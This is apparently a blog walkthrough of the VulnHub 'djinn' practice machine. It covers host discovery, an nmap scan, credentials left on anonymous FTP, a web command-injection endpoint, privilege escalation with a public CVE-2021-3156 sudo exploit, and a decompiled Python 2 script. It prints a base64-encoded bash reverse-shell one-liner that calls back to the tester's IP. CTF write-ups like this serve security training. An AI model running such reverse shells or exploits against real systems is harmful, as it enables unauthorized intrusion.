vulnhub-wp djinn

🖳 host discover

sudo netdiscoer -r 192.168.165.0/24

1
2
3
4
5
6
7
8
9
Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                                                          
                                                                                                                                                                       
5 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 300                                                                                                        
_____________________________________________________________________________
  IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
-----------------------------------------------------------------------------
192.168.165.14  c6:3b:70:2b:33:1e      3     180  Unknown vendor                                                                                                       
192.168.165.109 08:00:27:43:80:7b      1      60  PCS Systemtechnik GmbH                                                                                               
192.168.165.196 20:1e:88:ad:fc:55      1      60  Intel Corporate

target was 192.168.165.109

👁 service scan

nmap scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
sudo nmap -p- -sV -sC -Pn -oN nmap --min-rate 8000 192.168.165.109
···
PORT     STATE    SERVICE VERSION
21/tcp   open     ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 0        0              11 Oct 20  2019 creds.txt
| -rw-r--r--    1 0        0             128 Oct 21  2019 game.txt
|_-rw-r--r--    1 0        0             113 Oct 21  2019 message.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.165.130
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp   filtered ssh
1337/tcp open     waste?
| fingerprint-strings: 
|   NULL: 
|     ____ _____ _ 
|     ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___ 
|     \x20/ _ \x20 | | | | '_ ` _ \x20/ _ \n| |_| | (_| | | | | | | __/ | | | | | | | | | __/
|     ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___|
|     Let's see how good you are with simple maths
|     Answer my questions 1000 times and I'll give you your gift.
|     '-', 8)
|   RPCCheck: 
|     ____ _____ _ 
|     ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___ 
|     \x20/ _ \x20 | | | | '_ ` _ \x20/ _ \n| |_| | (_| | | | | | | __/ | | | | | | | | | __/
|     ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___|
|     Let's see how good you are with simple maths
|     Answer my questions 1000 times and I'll give you your gift.
|_    '-', 1)
7331/tcp open     http    Werkzeug httpd 0.16.0 (Python 2.7.15+)
|_http-title: Lost in space
|_http-server-header: Werkzeug/0.16.0 Python/2.7.15+
···

🚪🚶 get shell

port 21 have anonymous,and we get creds.txt,game.txt,message.txt

1
2
3
4
5
6
7
8
9
10
cat message.txt          
@nitish81299 I am going on holidays for few days, please take care of all the work. 
And don't mess up anything.

cat game.txt 
oh and I forgot to tell you I've setup a game for you on port 1337. See if you can reach to the 
final level and get the prize.

cat creds.txt 
nitu:81299

we connect 1337 by nc,and find it was a game???

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
nc 192.168.165.109 1337 
  ____                        _____ _                
 / ___| __ _ _ __ ___   ___  |_   _(_)_ __ ___   ___ 
| |  _ / _` | '_ ` _ \ / _ \   | | | | '_ ` _ \ / _ \
| |_| | (_| | | | | | |  __/   | | | | | | | | |  __/
 \____|\__,_|_| |_| |_|\___|   |_| |_|_| |_| |_|\___|
                                                     

Let's see how good you are with simple maths
Answer my questions 1000 times and I'll give you your gift.
(9, '*', 8)
> 72
(4, '-', 8)
> -4
(1, '*', 7)
> 7
(3, '/', 9)
> 1/3
(4, '*', 4)
> 16
(7, '*', 4)
> 28
(9, '-', 1)
> 8
(7, '-', 8)
> -1
(9, '/', 3)
> 3
(4, '-', 1)
> exit
Stop acting like a hacker for a damn minute!!

it seems we need play 1000times,we try other port at first
we brute the path in 7331 web,and we find /wish and /genie
the /wish have a rce,so let’s try.

1
2
3
4
echo 'bash -i >& /dev/tcp/192.168.165.130/443 0>&1' | base64
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE2NS4xMzAvNDQzIDA+JjEK

echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE2NS4xMzAvNDQzIDA+JjEK | base64 -d | bash

after we receive the shell,let’s enum,and we find user:nitish’s cred

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
www-data@djinn:/home/nitish$ ls -la
ls -la
total 32
drwxr-xr-x 5 nitish nitish 4096 Nov 12  2019 .
drwxr-xr-x 4 root   root   4096 Nov 14  2019 ..
-rw------- 1 root   root    130 Nov 12  2019 .bash_history
-rw-r--r-- 1 nitish nitish 3771 Nov 11  2019 .bashrc
drwx------ 2 nitish nitish 4096 Nov 11  2019 .cache
drwxr-xr-x 2 nitish nitish 4096 Oct 21  2019 .dev
drwx------ 3 nitish nitish 4096 Nov 11  2019 .gnupg
-rw-r----- 1 nitish nitish   33 Nov 12  2019 user.txt
www-data@djinn:/home/nitish$ ls -la .dev
ls -la .dev
total 12
drwxr-xr-x 2 nitish nitish 4096 Oct 21  2019 .
drwxr-xr-x 5 nitish nitish 4096 Nov 12  2019 ..
-rw-r--r-- 1 nitish nitish   24 Oct 21  2019 creds.txt
www-data@djinn:/home/nitish$ cat .dev/creds.txt
cat .dev/creds.txt
nitish:p4ssw0rdStr3r0n9
www-data@djinn:/home/nitish$ su nitish
su nitish
Password: p4ssw0rdStr3r0n9

nitish@djinn:~$ whoami
whoami
nitish
nitish@djinn:~$ ls -la
ls -la
total 32
drwxr-xr-x 5 nitish nitish 4096 Nov 12  2019 .
drwxr-xr-x 4 root   root   4096 Nov 14  2019 ..
-rw------- 1 root   root    130 Nov 12  2019 .bash_history
-rw-r--r-- 1 nitish nitish 3771 Nov 11  2019 .bashrc
drwx------ 2 nitish nitish 4096 Nov 11  2019 .cache
drwxr-xr-x 2 nitish nitish 4096 Oct 21  2019 .dev
drwx------ 3 nitish nitish 4096 Nov 11  2019 .gnupg
-rw-r----- 1 nitish nitish   33 Nov 12  2019 user.txt
nitish@djinn:~$ cat user.txt
cat user.txt
10aay8289ptgguy1pvfa73alzusyyx3c
nitish@djinn:~$

so we get user.txt

🛡️ PE

sudo exploit PE

when u are in practice,use kernel vulnerabilities as little as possible, if the designer’s idea of ​​elevating privileges is not kernel vulnerabilities
after check the system version and sudo version,it seems be exploit 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
nitish@djinn:/opt/80/templates$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID:	Ubuntu
Description:	Ubuntu 18.04.3 LTS
Release:	18.04
Codename:	bionic
···
nitish@djinn:/opt/80/templates$ sudo -V
sudo -V
Sudo version 1.8.21p2
Sudoers policy plugin version 1.8.21p2
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.21p2

so we could use this exploit:https://github.com/worawit/CVE-2021-3156

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
nitish@djinn:~$ python3 exploit_sudo.py
python3 exploit_sudo.py
# whoami
whoami
root
# cd /root
# ./proof.sh
./proof.sh
TERM environment variable not set.
    _                        _             _ _ _ 
   / \   _ __ ___   __ _ ___(_)_ __   __ _| | | |
  / _ \ | '_ ` _ \ / _` |_  / | '_ \ / _` | | | |
 / ___ \| | | | | | (_| |/ /| | | | | (_| |_|_|_|
/_/   \_\_| |_| |_|\__,_/___|_|_| |_|\__, (_|_|_)
                                     |___/       
djinn pwned...
__________________________________________________________________________

Proof: 33eur2wjdmq80z47nyy4fx54bnlg3ibc
Path: /root
Date: Fri Mar 15 10:31:12 IST 2024
Whoami: root
__________________________________________________________________________

By @0xmzfr

Thanks to my fellow teammates in @m0tl3ycr3w for betatesting! :-)

default PE

there was a sudo binary file,we could find help by man


by lots of try,i find we could get sam’s shell by this -cmd

sam have the sudo too.

after try,it seems nothing,let’s enum next

we just find the .pyc file in sam’s home,let’s uncompile it
first we need download it from machine,we could copy it to web directory or start a python web

1
python -m SimpleHTTPServer

and uncompiled it(by tools uncompyle6)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
uncompyle6 .pyc
# uncompyle6 version 3.9.0
# Python bytecode version base 2.7 (62211)
# Decompiled from: Python 2.7.18 (default, Aug  1 2022, 06:23:55) 
# [GCC 12.1.0]
# Embedded file name: /home/mzfr/scripts/exp.py
# Compiled at: 2019-11-07 21:05:18
from getpass import getuser
from os import system
from random import randint

def naughtyboi():
    print 'Working on it!! '

def guessit():
    num = randint(1, 101)
    print 'Choose a number between 1 to 100: '
    s = input('Enter your number: ')
    if s == num:
        system('/bin/sh')
    else:
        print 'Better Luck next time'

def readfiles():
    user = getuser()
    path = input('Enter the full of the file to read: ')
    print 'User %s is not allowed to read %s' % (user, path)

def options():
    print 'What do you want to do ?'
    print '1 - Be naughty'
    print '2 - Guess the number'
    print '3 - Read some damn files'
    print '4 - Work'
    choice = int(input('Enter your choice: '))
    return choice

def main(op):
    if op == 1:
        naughtyboi()
    elif op == 2:
        guessit()
    elif op == 3:
        readfiles()
    elif op == 4:
        print 'work your ass off!!'
    else:
        print 'Do something better with your life'

if __name__ == '__main__':
    main(options())
# okay decompiling Untitled.pyc

though other’s walkthrough,it seems the python2’s exploit in funcinput

let’s get root

📖 recommend article

walkthrouth by Raj Chandel(python2 exploit PE)
walkthrough another one(there was another PE way!)
download djinn

vulnhub
#vulnhub
vulnhub-wp djinn
https://rightevil.github.io/vulnhub-wp-djinn/
作者
rightevil
发布于
2024年3月15日
许可协议